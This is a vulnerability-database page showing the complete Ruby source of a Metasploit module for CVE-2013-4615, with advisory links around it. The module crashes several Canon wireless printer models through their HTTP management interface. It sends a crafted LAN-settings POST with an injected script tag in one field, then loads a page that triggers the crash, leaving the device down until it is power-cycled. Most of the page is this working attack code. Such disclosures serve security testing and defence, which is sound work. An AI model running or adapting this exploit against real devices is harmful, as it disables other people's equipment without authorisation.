Vulners
Lucene search
Canon Wireless Printer Denial Of Service
🗓️ 15 Jun 2013 22:23:04Reported by Matt "hostess" Andreko <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 32 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2013-4615 | 29 May 201815:50 | – | circl |
 | Canon Wireless Printer Denial Of Service (CVE-2013-4615) | 13 Aug 201300:00 | – | checkpoint_advisories |
 | CVE-2013-4615 | 21 Jun 201321:00 | – | cve |
 | CVE-2013-4615 | 21 Jun 201321:00 | – | cvelist |
 | CVE-2013-4615 | 21 Jun 201321:55 | – | nvd |
 | Canon Printer Multiple Vulnerabilities (Jun 2013) - Active Check | 19 Jun 201300:00 | – | openvas |
 | Canon Printer DoS / Secret Disclosure | 18 Jun 201300:00 | – | packetstorm |
| Canon Wireless Printer Denial Of Service | 31 Aug 202400:00 | – | packetstorm |
 | Design/Logic Flaw | 21 Jun 201321:55 | – | prion |
 | CVE-2013-4615 | 22 May 202511:13 | – | redhatcve |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Canon Wireless Printer Denial Of Service',
'Description' => %q{
The HTTP management interface on several models of Canon Wireless printers
allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:
if this module is successful, the device can only be recovered with a physical
power cycle.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
],
'References' => [
[ 'CVE', '2013-4615' ],
[ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
],
'DisclosureDate' => '2013-06-18'))
end
def is_alive?
res = send_request_raw({
'method' => 'GET',
'uri' => '/',
},10)
return !res.nil?
end
def run
begin
# The first request will set the new IP
res = send_request_cgi({
'method' => 'POST',
'uri' => '/English/pages_MacUS/cgi_lan.cgi',
'data' => 'OK.x=61' +
'&OK.y=12' +
'&LAN_OPT1=2' +
'&LAN_TXT1=Wireless' +
'&LAN_OPT3=1' +
'&LAN_TXT21=192' +
'&LAN_TXT22=168' +
'&LAN_TXT23=1' +
'&LAN_TXT24=114"><script>alert(\'xss\');</script>' +
'&LAN_TXT31=255' +
'&LAN_TXT32=255' +
'&LAN_TXT33=255' +
'&LAN_TXT34=0' +
'&LAN_TXT41=192' +
'&LAN_TXT42=168' +
'&LAN_TXT43=1' +
'&LAN_TXT44=1' +
'&LAN_OPT2=4' +
'&LAN_OPT4=1' +
'&LAN_HID1=1'
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
print_error("Couldn't connect to #{rhost}:#{rport}")
return
end
# The second request will load the network options page, which seems to trigger the DoS
send_request_cgi({
'method' => 'GET',
'uri' => '/English/pages_MacUS/lan_set_content.html'
},5) #default timeout, we don't care about the response
# Check to see if it worked or not
if is_alive?
print_error("#{rhost}:#{rport} - Server is still alive")
else
print_good("#{rhost}:#{rport} - Connection Refused: Success!")
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Feb 2022 23:22Current
0.6Low risk
Vulners AI Score0.6
CVSS 25
EPSS0.63316